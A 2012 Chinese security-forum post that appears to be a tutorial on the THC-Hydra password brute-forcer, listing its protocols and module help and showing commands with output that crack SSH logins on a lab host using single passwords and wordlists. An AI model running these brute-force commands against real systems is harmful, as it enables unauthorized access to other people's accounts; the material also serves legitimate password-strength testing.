切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
200 暴力破解 — THC-Hydra 3[复制链接]
发表于 2012-10-4 21:21:57 | 显示全部楼层 |!read_mode!
支持协议他目前支持这些协议
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2),
Telnet, VMware-Auth, VNC and XMPP.
查看模块信息hydra -U 模块名字
  1. root@Dis9Team:~# hydra -U http-post-form
  2. Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  3. Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:40:57

  4. Help for module http-post-form:
  5. ============================================================================
  6. Module http-post-form requires the page and the parameters for the web form.

  7. By default this module is configured to follow a maximum of 5 redirections in
  8. a row. It always gathers a new cookie from the same URL without variables
  9. The parameters take three ":" separated values, plus optional values.

  10. Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
  11. First is the page on the server to GET or POST to (URL).
  12. Second is the POST/GET variables (taken from either the browser, proxy, etc.
  13. with usernames and passwords being replaced in the "^USER^" and "^PASS^"
  14. placeholders (FORM PARAMETERS)
  15. Third is the string that it checks for an *invalid* login (by default)
  16. Invalid condition login check can be preceded by "F=", successful condition
  17. login check must be preceded by "S=".
  18. This is where most people get it wrong. You have to check the webapp what a
  19. failed string looks like and put it in this parameter!
  20. The following parameters are optional:
  21. C=/page/uri     to define a different page to gather initial cookies from
  22. H=My-Hdr: foo   to send a user defined HTTP header with each request
  23. Examples:
  24. "/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect"
  25. "/login.php:user=^USER^&pass=^PASS^&mid=123:S=authlog=.*success"
  26. "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
  27. "/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"
  28. "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
  29. root@Dis9Team:~# hydra -U http-post-form
复制代码

他给出了帮助
设定账号密码用户:-l 单个 -L 字典
密码:-p 单个 -L 字典
例子单用户单密码
  1. root@Dis9Team:~# hydra -l root -p 123456 5.5.5.3 ssh
  2. Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  3. Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:45:26
  4. [DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
  5. [DATA] attacking service ssh on port 22
  6. [22][ssh] host: 5.5.5.3   login: root   password: 123456
  7. [STATUS] attack finished for 5.5.5.3 (waiting for children to finish)
  8. 1 of 1 target successfuly completed, 1 valid password found
  9. Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 00:45:26
  10. root@Dis9Team:~#
复制代码
使用字典破解
  1. root@Dis9Team:~# hydra -l root -P /tmp/password 5.5.5.3 ssh
复制代码

账号密码使用字典
  1. root@Dis9Team:~# hydra -L /tmp/username -P /tmp/password 5.5.5.3 ssh
  2. Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  3. Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:46:23
  4. [DATA] 6 tasks, 1 server, 6 login tries (l:2/p:3), ~1 try per task
  5. [DATA] attacking service ssh on port 22
  6. [22][ssh] host: 5.5.5.3   login: root   password: 123456
  7. [STATUS] attack finished for 5.5.5.3 (waiting for children to finish)
  8. 1 of 1 target successfuly completed, 1 valid password found
  9. Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 00:46:25
  10. root@Dis9Team:~#
复制代码

指定协议端口-s 端口
  1. root@Dis9Team:~# hydra -L /tmp/username -P /tmp/password 5.5.5.3 ssh -s 22
  2. Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

  3. Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:47:32
  4. [DATA] 6 tasks, 1 server, 6 login tries (l:2/p:3), ~1 try per task
  5. [DATA] attacking service ssh on port 22
  6. [22][ssh] host: 5.5.5.3   login: root   password: 123456
  7. [STATUS] attack finished for 5.5.5.3 (waiting for children to finish)
  8. 1 of 1 target successfuly completed, 1 valid password found
  9. Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 00:47:34
  10. root@Dis9Team:~#
复制代码

指定线程默认是16,你可以用-t指定
  1. root@Dis9Team:~# hydra -L /tmp/username -P /tmp/password 5.5.5.3 ssh -t 100
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-29 09:56

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部